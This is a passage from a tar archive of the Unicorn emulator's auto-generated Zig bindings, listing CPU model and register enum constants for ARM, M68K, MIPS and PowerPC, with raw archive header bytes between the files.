AUTO-GENERATED FILE, DO NOT EDIT pub const armConst = enum(c_int) { // ARM CPU CPU_ARM_926 = 0, CPU_ARM_946 = 1, CPU_ARM_1026 = 2, CPU_ARM_1136_R2 = 3, CPU_ARM_1136 = 4, CPU_ARM_1176 = 5, CPU_ARM_11MPCORE = 6, CPU_ARM_CORTEX_M0 = 7, CPU_ARM_CORTEX_M3 = 8, CPU_ARM_CORTEX_M4 = 9, CPU_ARM_CORTEX_M7 = 10, CPU_ARM_CORTEX_M33 = 11, CPU_ARM_CORTEX_R5 = 12, CPU_ARM_CORTEX_R5F = 13, CPU_ARM_CORTEX_A7 = 14, CPU_ARM_CORTEX_A8 = 15, CPU_ARM_CORTEX_A9 = 16, CPU_ARM_CORTEX_A15 = 17, CPU_ARM_TI925T = 18, CPU_ARM_SA1100 = 19, CPU_ARM_SA1110 = 20, CPU_ARM_PXA250 = 21, CPU_ARM_PXA255 = 22, CPU_ARM_PXA260 = 23, CPU_ARM_PXA261 = 24, CPU_ARM_PXA262 = 25, CPU_ARM_PXA270 = 26, CPU_ARM_PXA270A0 = 27, CPU_ARM_PXA270A1 = 28, CPU_ARM_PXA270B0 = 29, CPU_ARM_PXA270B1 = 30, CPU_ARM_PXA270C0 = 31, CPU_ARM_PXA270C5 = 32, CPU_ARM_MAX = 33, CPU_ARM_ENDING = 34, // ARM registers ARM_REG_INVALID = 0, ARM_REG_APSR = 1, ARM_REG_APSR_NZCV = 2, ARM_REG_CPSR = 3, ARM_REG_FPEXC = 4, ARM_REG_FPINST = 5, ARM_REG_FPSCR = 6, ARM_REG_FPSCR_NZCV = 7, ARM_REG_FPSID = 8, ARM_REG_ITSTATE = 9, ARM_REG_LR = 10, ARM_REG_PC = 11, ARM_REG_SP = 12, ARM_REG_SPSR = 13, ARM_REG_D0 = 14, ARM_REG_D1 = 15, ARM_REG_D2 = 16, ARM_REG_D3 = 17, ARM_REG_D4 = 18, ARM_REG_D5 = 19, ARM_REG_D6 = 20, ARM_REG_D7 = 21, ARM_REG_D8 = 22, ARM_REG_D9 = 23, ARM_REG_D10 = 24, ARM_REG_D11 = 25, ARM_REG_D12 = 26, ARM_REG_D13 = 27, ARM_REG_D14 = 28, ARM_REG_D15 = 29, ARM_REG_D16 = 30, ARM_REG_D17 = 31, ARM_REG_D18 = 32, ARM_REG_D19 = 33, ARM_REG_D20 = 34, ARM_REG_D21 = 35, ARM_REG_D22 = 36, ARM_REG_D23 = 37, ARM_REG_D24 = 38, ARM_REG_D25 = 39, ARM_REG_D26 = 40, ARM_REG_D27 = 41, ARM_REG_D28 = 42, ARM_REG_D29 = 43, ARM_REG_D30 = 44, ARM_REG_D31 = 45, ARM_REG_FPINST2 = 46, ARM_REG_MVFR0 = 47, ARM_REG_MVFR1 = 48, ARM_REG_MVFR2 = 49, ARM_REG_Q0 = 50, ARM_REG_Q1 = 51, ARM_REG_Q2 = 52, ARM_REG_Q3 = 53, ARM_REG_Q4 = 54, ARM_REG_Q5 = 55, ARM_REG_Q6 = 56, ARM_REG_Q7 = 57, ARM_REG_Q8 = 58, ARM_REG_Q9 = 59, ARM_REG_Q10 = 60, ARM_REG_Q11 = 61, ARM_REG_Q12 = 62, ARM_REG_Q13 = 63, ARM_REG_Q14 = 64, ARM_REG_Q15 = 65, ARM_REG_R0 = 66, ARM_REG_R1 = 67, ARM_REG_R2 = 68, ARM_REG_R3 = 69, ARM_REG_R4 = 70, ARM_REG_R5 = 71, ARM_REG_R6 = 72, ARM_REG_R7 = 73, ARM_REG_R8 = 74, ARM_REG_R9 = 75, ARM_REG_R10 = 76, ARM_REG_R11 = 77, ARM_REG_R12 = 78, ARM_REG_S0 = 79, ARM_REG_S1 = 80, ARM_REG_S2 = 81, ARM_REG_S3 = 82, ARM_REG_S4 = 83, ARM_REG_S5 = 84, ARM_REG_S6 = 85, ARM_REG_S7 = 86, ARM_REG_S8 = 87, ARM_REG_S9 = 88, ARM_REG_S10 = 89, ARM_REG_S11 = 90, ARM_REG_S12 = 91, ARM_REG_S13 = 92, ARM_REG_S14 = 93, ARM_REG_S15 = 94, ARM_REG_S16 = 95, ARM_REG_S17 = 96, ARM_REG_S18 = 97, ARM_REG_S19 = 98, ARM_REG_S20 = 99, ARM_REG_S21 = 100, ARM_REG_S22 = 101, ARM_REG_S23 = 102, ARM_REG_S24 = 103, ARM_REG_S25 = 104, ARM_REG_S26 = 105, ARM_REG_S27 = 106, ARM_REG_S28 = 107, ARM_REG_S29 = 108, ARM_REG_S30 = 109, ARM_REG_S31 = 110, ARM_REG_C1_C0_2 = 111, ARM_REG_C13_C0_2 = 112, ARM_REG_C13_C0_3 = 113, ARM_REG_IPSR = 114, ARM_REG_MSP = 115, ARM_REG_PSP = 116, ARM_REG_CONTROL = 117, ARM_REG_IAPSR = 118, ARM_REG_EAPSR = 119, ARM_REG_XPSR = 120, ARM_REG_EPSR = 121, ARM_REG_IEPSR = 122, ARM_REG_PRIMASK = 123, ARM_REG_BASEPRI = 124, ARM_REG_BASEPRI_MAX = 125, ARM_REG_FAULTMASK = 126, ARM_REG_APSR_NZCVQ = 127, ARM_REG_APSR_G = 128, ARM_REG_APSR_NZCVQG = 129, ARM_REG_IAPSR_NZCVQ = 130, ARM_REG_IAPSR_G = 131, ARM_REG_IAPSR_NZCVQG = 132, ARM_REG_EAPSR_NZCVQ = 133, ARM_REG_EAPSR_G = 134, ARM_REG_EAPSR_NZCVQG = 135, ARM_REG_XPSR_NZCVQ = 136, ARM_REG_XPSR_G = 137, ARM_REG_XPSR_NZCVQG = 138, ARM_REG_CP_REG = 139, ARM_REG_ENDING = 
140, // alias registers ARM_REG_R13 = 12, ARM_REG_R14 = 10, ARM_REG_R15 = 11, ARM_REG_SB = 75, ARM_REG_SL = 76, ARM_REG_FP = 77, ARM_REG_IP = 78, }; ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/m68k_const.zig���������������������������������������������������0000664�0000000�0000000�00000001324�14675241067�0021755�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const m68kConst = enum(c_int) { // M68K CPU CPU_M68K_M5206 = 0, CPU_M68K_M68000 = 1, CPU_M68K_M68020 = 2, CPU_M68K_M68030 = 3, CPU_M68K_M68040 = 4, CPU_M68K_M68060 = 5, CPU_M68K_M5208 = 6, CPU_M68K_CFV4E = 7, CPU_M68K_ANY = 8, CPU_M68K_ENDING = 9, // M68K registers M68K_REG_INVALID = 0, M68K_REG_A0 = 1, M68K_REG_A1 = 2, M68K_REG_A2 = 3, M68K_REG_A3 = 4, M68K_REG_A4 = 5, M68K_REG_A5 = 6, M68K_REG_A6 = 7, M68K_REG_A7 = 8, M68K_REG_D0 = 9, M68K_REG_D1 = 10, M68K_REG_D2 = 11, M68K_REG_D3 = 12, M68K_REG_D4 = 13, M68K_REG_D5 = 14, M68K_REG_D6 = 15, M68K_REG_D7 = 16, M68K_REG_SR = 17, M68K_REG_PC = 18, M68K_REG_ENDING = 19, }; ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/mips_const.zig���������������������������������������������������0000664�0000000�0000000�00000011134�14675241067�0022140�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT pub const mipsConst = enum(c_int) { // MIPS32 CPUS CPU_MIPS32_4KC = 0, CPU_MIPS32_4KM = 1, CPU_MIPS32_4KECR1 = 2, CPU_MIPS32_4KEMR1 = 3, CPU_MIPS32_4KEC = 4, CPU_MIPS32_4KEM = 5, CPU_MIPS32_24KC = 6, CPU_MIPS32_24KEC = 7, CPU_MIPS32_24KF = 8, CPU_MIPS32_34KF = 9, CPU_MIPS32_74KF = 10, CPU_MIPS32_M14K = 11, CPU_MIPS32_M14KC = 12, CPU_MIPS32_P5600 = 13, CPU_MIPS32_MIPS32R6_GENERIC = 14, CPU_MIPS32_I7200 = 15, CPU_MIPS32_ENDING = 16, // MIPS64 CPUS CPU_MIPS64_R4000 = 0, CPU_MIPS64_VR5432 = 1, CPU_MIPS64_5KC = 2, CPU_MIPS64_5KF = 3, CPU_MIPS64_20KC = 4, CPU_MIPS64_MIPS64R2_GENERIC = 5, CPU_MIPS64_5KEC = 6, CPU_MIPS64_5KEF = 7, CPU_MIPS64_I6400 = 8, CPU_MIPS64_I6500 = 9, CPU_MIPS64_LOONGSON_2E = 10, CPU_MIPS64_LOONGSON_2F = 11, CPU_MIPS64_MIPS64DSPR2 = 12, CPU_MIPS64_ENDING = 13, // MIPS registers MIPS_REG_INVALID = 0, // General purpose registers MIPS_REG_PC = 1, MIPS_REG_0 = 2, MIPS_REG_1 = 3, MIPS_REG_2 = 4, MIPS_REG_3 = 5, MIPS_REG_4 = 6, MIPS_REG_5 = 7, MIPS_REG_6 = 8, MIPS_REG_7 = 9, MIPS_REG_8 = 10, MIPS_REG_9 = 11, MIPS_REG_10 = 12, MIPS_REG_11 = 13, MIPS_REG_12 = 14, MIPS_REG_13 = 15, MIPS_REG_14 = 16, MIPS_REG_15 = 17, MIPS_REG_16 = 18, MIPS_REG_17 = 19, MIPS_REG_18 = 20, MIPS_REG_19 = 21, MIPS_REG_20 = 22, MIPS_REG_21 = 23, MIPS_REG_22 = 24, MIPS_REG_23 = 25, MIPS_REG_24 = 26, MIPS_REG_25 = 27, MIPS_REG_26 = 28, MIPS_REG_27 = 29, MIPS_REG_28 = 30, MIPS_REG_29 = 31, MIPS_REG_30 = 32, MIPS_REG_31 = 33, // DSP registers MIPS_REG_DSPCCOND = 34, MIPS_REG_DSPCARRY = 35, MIPS_REG_DSPEFI = 36, MIPS_REG_DSPOUTFLAG = 37, MIPS_REG_DSPOUTFLAG16_19 = 38, MIPS_REG_DSPOUTFLAG20 = 39, MIPS_REG_DSPOUTFLAG21 = 40, MIPS_REG_DSPOUTFLAG22 = 41, MIPS_REG_DSPOUTFLAG23 = 42, MIPS_REG_DSPPOS = 43, MIPS_REG_DSPSCOUNT = 44, // ACC registers MIPS_REG_AC0 = 45, MIPS_REG_AC1 = 46, MIPS_REG_AC2 = 47, MIPS_REG_AC3 = 48, // COP registers MIPS_REG_CC0 = 49, MIPS_REG_CC1 = 50, MIPS_REG_CC2 = 51, MIPS_REG_CC3 = 52, MIPS_REG_CC4 = 53, MIPS_REG_CC5 = 54, MIPS_REG_CC6 = 55, MIPS_REG_CC7 = 56, // FPU registers MIPS_REG_F0 = 57, MIPS_REG_F1 = 58, MIPS_REG_F2 = 59, MIPS_REG_F3 = 60, MIPS_REG_F4 = 61, MIPS_REG_F5 = 62, MIPS_REG_F6 = 63, MIPS_REG_F7 = 64, MIPS_REG_F8 = 65, MIPS_REG_F9 = 66, MIPS_REG_F10 = 67, MIPS_REG_F11 = 68, MIPS_REG_F12 = 69, MIPS_REG_F13 = 70, MIPS_REG_F14 = 71, MIPS_REG_F15 = 72, MIPS_REG_F16 = 73, MIPS_REG_F17 = 74, MIPS_REG_F18 = 75, MIPS_REG_F19 = 76, MIPS_REG_F20 = 77, MIPS_REG_F21 = 78, MIPS_REG_F22 = 79, MIPS_REG_F23 = 80, MIPS_REG_F24 = 81, MIPS_REG_F25 = 82, MIPS_REG_F26 = 83, MIPS_REG_F27 = 84, MIPS_REG_F28 = 85, MIPS_REG_F29 = 86, MIPS_REG_F30 = 87, MIPS_REG_F31 = 88, MIPS_REG_FCC0 = 89, MIPS_REG_FCC1 = 90, MIPS_REG_FCC2 = 91, MIPS_REG_FCC3 = 92, MIPS_REG_FCC4 = 93, MIPS_REG_FCC5 = 94, MIPS_REG_FCC6 = 95, MIPS_REG_FCC7 = 96, // AFPR128 MIPS_REG_W0 = 97, MIPS_REG_W1 = 98, MIPS_REG_W2 = 99, MIPS_REG_W3 = 100, MIPS_REG_W4 = 101, MIPS_REG_W5 = 102, MIPS_REG_W6 = 103, MIPS_REG_W7 = 104, MIPS_REG_W8 = 105, MIPS_REG_W9 = 106, MIPS_REG_W10 = 107, MIPS_REG_W11 = 108, MIPS_REG_W12 = 109, MIPS_REG_W13 = 110, MIPS_REG_W14 = 111, MIPS_REG_W15 = 112, MIPS_REG_W16 = 113, MIPS_REG_W17 = 114, MIPS_REG_W18 = 115, MIPS_REG_W19 = 116, MIPS_REG_W20 = 117, MIPS_REG_W21 = 118, MIPS_REG_W22 = 119, MIPS_REG_W23 = 120, MIPS_REG_W24 = 121, MIPS_REG_W25 = 122, MIPS_REG_W26 = 123, MIPS_REG_W27 = 124, MIPS_REG_W28 = 125, MIPS_REG_W29 = 126, MIPS_REG_W30 = 127, MIPS_REG_W31 = 128, MIPS_REG_HI = 129, MIPS_REG_LO = 130, MIPS_REG_P0 = 131, MIPS_REG_P1 = 132, MIPS_REG_P2 = 133, MIPS_REG_MPL0 = 
134, MIPS_REG_MPL1 = 135, MIPS_REG_MPL2 = 136, MIPS_REG_CP0_CONFIG3 = 137, MIPS_REG_CP0_USERLOCAL = 138, MIPS_REG_CP0_STATUS = 139, MIPS_REG_ENDING = 140, MIPS_REG_ZERO = 2, MIPS_REG_AT = 3, MIPS_REG_V0 = 4, MIPS_REG_V1 = 5, MIPS_REG_A0 = 6, MIPS_REG_A1 = 7, MIPS_REG_A2 = 8, MIPS_REG_A3 = 9, MIPS_REG_T0 = 10, MIPS_REG_T1 = 11, MIPS_REG_T2 = 12, MIPS_REG_T3 = 13, MIPS_REG_T4 = 14, MIPS_REG_T5 = 15, MIPS_REG_T6 = 16, MIPS_REG_T7 = 17, MIPS_REG_S0 = 18, MIPS_REG_S1 = 19, MIPS_REG_S2 = 20, MIPS_REG_S3 = 21, MIPS_REG_S4 = 22, MIPS_REG_S5 = 23, MIPS_REG_S6 = 24, MIPS_REG_S7 = 25, MIPS_REG_T8 = 26, MIPS_REG_T9 = 27, MIPS_REG_K0 = 28, MIPS_REG_K1 = 29, MIPS_REG_GP = 30, MIPS_REG_SP = 31, MIPS_REG_FP = 32, MIPS_REG_S8 = 32, MIPS_REG_RA = 33, MIPS_REG_HI0 = 45, MIPS_REG_HI1 = 46, MIPS_REG_HI2 = 47, MIPS_REG_HI3 = 48, MIPS_REG_LO0 = 45, MIPS_REG_LO1 = 46, MIPS_REG_LO2 = 47, MIPS_REG_LO3 = 48, }; ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/ppc_const.zig����������������������������������������������������0000664�0000000�0000000�00000023602�14675241067�0021755�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT pub const ppcConst = enum(c_int) { // PPC CPU CPU_PPC32_401 = 0, CPU_PPC32_401A1 = 1, CPU_PPC32_401B2 = 2, CPU_PPC32_401C2 = 3, CPU_PPC32_401D2 = 4, CPU_PPC32_401E2 = 5, CPU_PPC32_401F2 = 6, CPU_PPC32_401G2 = 7, CPU_PPC32_IOP480 = 8, CPU_PPC32_COBRA = 9, CPU_PPC32_403GA = 10, CPU_PPC32_403GB = 11, CPU_PPC32_403GC = 12, CPU_PPC32_403GCX = 13, CPU_PPC32_405D2 = 14, CPU_PPC32_405D4 = 15, CPU_PPC32_405CRA = 16, CPU_PPC32_405CRB = 17, CPU_PPC32_405CRC = 18, CPU_PPC32_405EP = 19, CPU_PPC32_405EZ = 20, CPU_PPC32_405GPA = 21, CPU_PPC32_405GPB = 22, CPU_PPC32_405GPC = 23, CPU_PPC32_405GPD = 24, CPU_PPC32_405GPR = 25, CPU_PPC32_405LP = 26, CPU_PPC32_NPE405H = 27, CPU_PPC32_NPE405H2 = 28, CPU_PPC32_NPE405L = 29, CPU_PPC32_NPE4GS3 = 30, CPU_PPC32_STB03 = 31, CPU_PPC32_STB04 = 32, CPU_PPC32_STB25 = 33, CPU_PPC32_X2VP4 = 34, CPU_PPC32_X2VP20 = 35, CPU_PPC32_440_XILINX = 36, CPU_PPC32_440_XILINX_W_DFPU = 37, CPU_PPC32_440EPA = 38, CPU_PPC32_440EPB = 39, CPU_PPC32_440EPX = 40, CPU_PPC32_460EXB = 41, CPU_PPC32_G2 = 42, CPU_PPC32_G2H4 = 43, CPU_PPC32_G2GP = 44, CPU_PPC32_G2LS = 45, CPU_PPC32_G2HIP3 = 46, CPU_PPC32_G2HIP4 = 47, CPU_PPC32_MPC603 = 48, CPU_PPC32_G2LE = 49, CPU_PPC32_G2LEGP = 50, CPU_PPC32_G2LELS = 51, CPU_PPC32_G2LEGP1 = 52, CPU_PPC32_G2LEGP3 = 53, CPU_PPC32_MPC5200_V10 = 54, CPU_PPC32_MPC5200_V11 = 55, CPU_PPC32_MPC5200_V12 = 56, CPU_PPC32_MPC5200B_V20 = 57, CPU_PPC32_MPC5200B_V21 = 58, CPU_PPC32_E200Z5 = 59, CPU_PPC32_E200Z6 = 60, CPU_PPC32_E300C1 = 61, CPU_PPC32_E300C2 = 62, CPU_PPC32_E300C3 = 63, CPU_PPC32_E300C4 = 64, CPU_PPC32_MPC8343 = 65, CPU_PPC32_MPC8343A = 66, CPU_PPC32_MPC8343E = 67, CPU_PPC32_MPC8343EA = 68, CPU_PPC32_MPC8347T = 69, CPU_PPC32_MPC8347P = 70, CPU_PPC32_MPC8347AT = 71, CPU_PPC32_MPC8347AP = 72, CPU_PPC32_MPC8347ET = 73, CPU_PPC32_MPC8347EP = 74, CPU_PPC32_MPC8347EAT = 75, CPU_PPC32_MPC8347EAP = 76, CPU_PPC32_MPC8349 = 77, CPU_PPC32_MPC8349A = 78, CPU_PPC32_MPC8349E = 79, CPU_PPC32_MPC8349EA = 80, CPU_PPC32_MPC8377 = 81, CPU_PPC32_MPC8377E = 82, CPU_PPC32_MPC8378 = 83, CPU_PPC32_MPC8378E = 84, CPU_PPC32_MPC8379 = 85, CPU_PPC32_MPC8379E = 86, CPU_PPC32_E500_V10 = 87, CPU_PPC32_E500_V20 = 88, CPU_PPC32_E500V2_V10 = 89, CPU_PPC32_E500V2_V20 = 90, CPU_PPC32_E500V2_V21 = 91, CPU_PPC32_E500V2_V22 = 92, CPU_PPC32_E500V2_V30 = 93, CPU_PPC32_E500MC = 94, CPU_PPC32_MPC8533_V10 = 95, CPU_PPC32_MPC8533_V11 = 96, CPU_PPC32_MPC8533E_V10 = 97, CPU_PPC32_MPC8533E_V11 = 98, CPU_PPC32_MPC8540_V10 = 99, CPU_PPC32_MPC8540_V20 = 100, CPU_PPC32_MPC8540_V21 = 101, CPU_PPC32_MPC8541_V10 = 102, CPU_PPC32_MPC8541_V11 = 103, CPU_PPC32_MPC8541E_V10 = 104, CPU_PPC32_MPC8541E_V11 = 105, CPU_PPC32_MPC8543_V10 = 106, CPU_PPC32_MPC8543_V11 = 107, CPU_PPC32_MPC8543_V20 = 108, CPU_PPC32_MPC8543_V21 = 109, CPU_PPC32_MPC8543E_V10 = 110, CPU_PPC32_MPC8543E_V11 = 111, CPU_PPC32_MPC8543E_V20 = 112, CPU_PPC32_MPC8543E_V21 = 113, CPU_PPC32_MPC8544_V10 = 114, CPU_PPC32_MPC8544_V11 = 115, CPU_PPC32_MPC8544E_V10 = 116, CPU_PPC32_MPC8544E_V11 = 117, CPU_PPC32_MPC8545_V20 = 118, CPU_PPC32_MPC8545_V21 = 119, CPU_PPC32_MPC8545E_V20 = 120, CPU_PPC32_MPC8545E_V21 = 121, CPU_PPC32_MPC8547E_V20 = 122, CPU_PPC32_MPC8547E_V21 = 123, CPU_PPC32_MPC8548_V10 = 124, CPU_PPC32_MPC8548_V11 = 125, CPU_PPC32_MPC8548_V20 = 126, CPU_PPC32_MPC8548_V21 = 127, CPU_PPC32_MPC8548E_V10 = 128, CPU_PPC32_MPC8548E_V11 = 129, CPU_PPC32_MPC8548E_V20 = 130, CPU_PPC32_MPC8548E_V21 = 131, CPU_PPC32_MPC8555_V10 = 132, CPU_PPC32_MPC8555_V11 = 133, CPU_PPC32_MPC8555E_V10 = 134, CPU_PPC32_MPC8555E_V11 = 135, 
CPU_PPC32_MPC8560_V10 = 136, CPU_PPC32_MPC8560_V20 = 137, CPU_PPC32_MPC8560_V21 = 138, CPU_PPC32_MPC8567 = 139, CPU_PPC32_MPC8567E = 140, CPU_PPC32_MPC8568 = 141, CPU_PPC32_MPC8568E = 142, CPU_PPC32_MPC8572 = 143, CPU_PPC32_MPC8572E = 144, CPU_PPC32_E600 = 145, CPU_PPC32_MPC8610 = 146, CPU_PPC32_MPC8641 = 147, CPU_PPC32_MPC8641D = 148, CPU_PPC32_601_V0 = 149, CPU_PPC32_601_V1 = 150, CPU_PPC32_601_V2 = 151, CPU_PPC32_602 = 152, CPU_PPC32_603 = 153, CPU_PPC32_603E_V1_1 = 154, CPU_PPC32_603E_V1_2 = 155, CPU_PPC32_603E_V1_3 = 156, CPU_PPC32_603E_V1_4 = 157, CPU_PPC32_603E_V2_2 = 158, CPU_PPC32_603E_V3 = 159, CPU_PPC32_603E_V4 = 160, CPU_PPC32_603E_V4_1 = 161, CPU_PPC32_603E7 = 162, CPU_PPC32_603E7T = 163, CPU_PPC32_603E7V = 164, CPU_PPC32_603E7V1 = 165, CPU_PPC32_603E7V2 = 166, CPU_PPC32_603P = 167, CPU_PPC32_604 = 168, CPU_PPC32_604E_V1_0 = 169, CPU_PPC32_604E_V2_2 = 170, CPU_PPC32_604E_V2_4 = 171, CPU_PPC32_604R = 172, CPU_PPC32_740_V1_0 = 173, CPU_PPC32_750_V1_0 = 174, CPU_PPC32_740_V2_0 = 175, CPU_PPC32_750_V2_0 = 176, CPU_PPC32_740_V2_1 = 177, CPU_PPC32_750_V2_1 = 178, CPU_PPC32_740_V2_2 = 179, CPU_PPC32_750_V2_2 = 180, CPU_PPC32_740_V3_0 = 181, CPU_PPC32_750_V3_0 = 182, CPU_PPC32_740_V3_1 = 183, CPU_PPC32_750_V3_1 = 184, CPU_PPC32_740E = 185, CPU_PPC32_750E = 186, CPU_PPC32_740P = 187, CPU_PPC32_750P = 188, CPU_PPC32_750CL_V1_0 = 189, CPU_PPC32_750CL_V2_0 = 190, CPU_PPC32_750CX_V1_0 = 191, CPU_PPC32_750CX_V2_0 = 192, CPU_PPC32_750CX_V2_1 = 193, CPU_PPC32_750CX_V2_2 = 194, CPU_PPC32_750CXE_V2_1 = 195, CPU_PPC32_750CXE_V2_2 = 196, CPU_PPC32_750CXE_V2_3 = 197, CPU_PPC32_750CXE_V2_4 = 198, CPU_PPC32_750CXE_V2_4B = 199, CPU_PPC32_750CXE_V3_0 = 200, CPU_PPC32_750CXE_V3_1 = 201, CPU_PPC32_750CXE_V3_1B = 202, CPU_PPC32_750CXR = 203, CPU_PPC32_750FL = 204, CPU_PPC32_750FX_V1_0 = 205, CPU_PPC32_750FX_V2_0 = 206, CPU_PPC32_750FX_V2_1 = 207, CPU_PPC32_750FX_V2_2 = 208, CPU_PPC32_750FX_V2_3 = 209, CPU_PPC32_750GL = 210, CPU_PPC32_750GX_V1_0 = 211, CPU_PPC32_750GX_V1_1 = 212, CPU_PPC32_750GX_V1_2 = 213, CPU_PPC32_750L_V2_0 = 214, CPU_PPC32_750L_V2_1 = 215, CPU_PPC32_750L_V2_2 = 216, CPU_PPC32_750L_V3_0 = 217, CPU_PPC32_750L_V3_2 = 218, CPU_PPC32_745_V1_0 = 219, CPU_PPC32_755_V1_0 = 220, CPU_PPC32_745_V1_1 = 221, CPU_PPC32_755_V1_1 = 222, CPU_PPC32_745_V2_0 = 223, CPU_PPC32_755_V2_0 = 224, CPU_PPC32_745_V2_1 = 225, CPU_PPC32_755_V2_1 = 226, CPU_PPC32_745_V2_2 = 227, CPU_PPC32_755_V2_2 = 228, CPU_PPC32_745_V2_3 = 229, CPU_PPC32_755_V2_3 = 230, CPU_PPC32_745_V2_4 = 231, CPU_PPC32_755_V2_4 = 232, CPU_PPC32_745_V2_5 = 233, CPU_PPC32_755_V2_5 = 234, CPU_PPC32_745_V2_6 = 235, CPU_PPC32_755_V2_6 = 236, CPU_PPC32_745_V2_7 = 237, CPU_PPC32_755_V2_7 = 238, CPU_PPC32_745_V2_8 = 239, CPU_PPC32_755_V2_8 = 240, CPU_PPC32_7400_V1_0 = 241, CPU_PPC32_7400_V1_1 = 242, CPU_PPC32_7400_V2_0 = 243, CPU_PPC32_7400_V2_1 = 244, CPU_PPC32_7400_V2_2 = 245, CPU_PPC32_7400_V2_6 = 246, CPU_PPC32_7400_V2_7 = 247, CPU_PPC32_7400_V2_8 = 248, CPU_PPC32_7400_V2_9 = 249, CPU_PPC32_7410_V1_0 = 250, CPU_PPC32_7410_V1_1 = 251, CPU_PPC32_7410_V1_2 = 252, CPU_PPC32_7410_V1_3 = 253, CPU_PPC32_7410_V1_4 = 254, CPU_PPC32_7448_V1_0 = 255, CPU_PPC32_7448_V1_1 = 256, CPU_PPC32_7448_V2_0 = 257, CPU_PPC32_7448_V2_1 = 258, CPU_PPC32_7450_V1_0 = 259, CPU_PPC32_7450_V1_1 = 260, CPU_PPC32_7450_V1_2 = 261, CPU_PPC32_7450_V2_0 = 262, CPU_PPC32_7450_V2_1 = 263, CPU_PPC32_7441_V2_1 = 264, CPU_PPC32_7441_V2_3 = 265, CPU_PPC32_7451_V2_3 = 266, CPU_PPC32_7441_V2_10 = 267, CPU_PPC32_7451_V2_10 = 268, CPU_PPC32_7445_V1_0 = 269, CPU_PPC32_7455_V1_0 = 270, 
CPU_PPC32_7445_V2_1 = 271, CPU_PPC32_7455_V2_1 = 272, CPU_PPC32_7445_V3_2 = 273, CPU_PPC32_7455_V3_2 = 274, CPU_PPC32_7445_V3_3 = 275, CPU_PPC32_7455_V3_3 = 276, CPU_PPC32_7445_V3_4 = 277, CPU_PPC32_7455_V3_4 = 278, CPU_PPC32_7447_V1_0 = 279, CPU_PPC32_7457_V1_0 = 280, CPU_PPC32_7447_V1_1 = 281, CPU_PPC32_7457_V1_1 = 282, CPU_PPC32_7457_V1_2 = 283, CPU_PPC32_7447A_V1_0 = 284, CPU_PPC32_7457A_V1_0 = 285, CPU_PPC32_7447A_V1_1 = 286, CPU_PPC32_7457A_V1_1 = 287, CPU_PPC32_7447A_V1_2 = 288, CPU_PPC32_7457A_V1_2 = 289, CPU_PPC32_ENDING = 290, // PPC64 CPU CPU_PPC64_E5500 = 0, CPU_PPC64_E6500 = 1, CPU_PPC64_970_V2_2 = 2, CPU_PPC64_970FX_V1_0 = 3, CPU_PPC64_970FX_V2_0 = 4, CPU_PPC64_970FX_V2_1 = 5, CPU_PPC64_970FX_V3_0 = 6, CPU_PPC64_970FX_V3_1 = 7, CPU_PPC64_970MP_V1_0 = 8, CPU_PPC64_970MP_V1_1 = 9, CPU_PPC64_POWER5_V2_1 = 10, CPU_PPC64_POWER7_V2_3 = 11, CPU_PPC64_POWER7_V2_1 = 12, CPU_PPC64_POWER8E_V2_1 = 13, CPU_PPC64_POWER8_V2_0 = 14, CPU_PPC64_POWER8NVL_V1_0 = 15, CPU_PPC64_POWER9_V1_0 = 16, CPU_PPC64_POWER9_V2_0 = 17, CPU_PPC64_POWER10_V1_0 = 18, CPU_PPC64_ENDING = 19, // PPC registers PPC_REG_INVALID = 0, // General purpose registers PPC_REG_PC = 1, PPC_REG_0 = 2, PPC_REG_1 = 3, PPC_REG_2 = 4, PPC_REG_3 = 5, PPC_REG_4 = 6, PPC_REG_5 = 7, PPC_REG_6 = 8, PPC_REG_7 = 9, PPC_REG_8 = 10, PPC_REG_9 = 11, PPC_REG_10 = 12, PPC_REG_11 = 13, PPC_REG_12 = 14, PPC_REG_13 = 15, PPC_REG_14 = 16, PPC_REG_15 = 17, PPC_REG_16 = 18, PPC_REG_17 = 19, PPC_REG_18 = 20, PPC_REG_19 = 21, PPC_REG_20 = 22, PPC_REG_21 = 23, PPC_REG_22 = 24, PPC_REG_23 = 25, PPC_REG_24 = 26, PPC_REG_25 = 27, PPC_REG_26 = 28, PPC_REG_27 = 29, PPC_REG_28 = 30, PPC_REG_29 = 31, PPC_REG_30 = 32, PPC_REG_31 = 33, PPC_REG_CR0 = 34, PPC_REG_CR1 = 35, PPC_REG_CR2 = 36, PPC_REG_CR3 = 37, PPC_REG_CR4 = 38, PPC_REG_CR5 = 39, PPC_REG_CR6 = 40, PPC_REG_CR7 = 41, PPC_REG_FPR0 = 42, PPC_REG_FPR1 = 43, PPC_REG_FPR2 = 44, PPC_REG_FPR3 = 45, PPC_REG_FPR4 = 46, PPC_REG_FPR5 = 47, PPC_REG_FPR6 = 48, PPC_REG_FPR7 = 49, PPC_REG_FPR8 = 50, PPC_REG_FPR9 = 51, PPC_REG_FPR10 = 52, PPC_REG_FPR11 = 53, PPC_REG_FPR12 = 54, PPC_REG_FPR13 = 55, PPC_REG_FPR14 = 56, PPC_REG_FPR15 = 57, PPC_REG_FPR16 = 58, PPC_REG_FPR17 = 59, PPC_REG_FPR18 = 60, PPC_REG_FPR19 = 61, PPC_REG_FPR20 = 62, PPC_REG_FPR21 = 63, PPC_REG_FPR22 = 64, PPC_REG_FPR23 = 65, PPC_REG_FPR24 = 66, PPC_REG_FPR25 = 67, PPC_REG_FPR26 = 68, PPC_REG_FPR27 = 69, PPC_REG_FPR28 = 70, PPC_REG_FPR29 = 71, PPC_REG_FPR30 = 72, PPC_REG_FPR31 = 73, PPC_REG_LR = 74, PPC_REG_XER = 75, 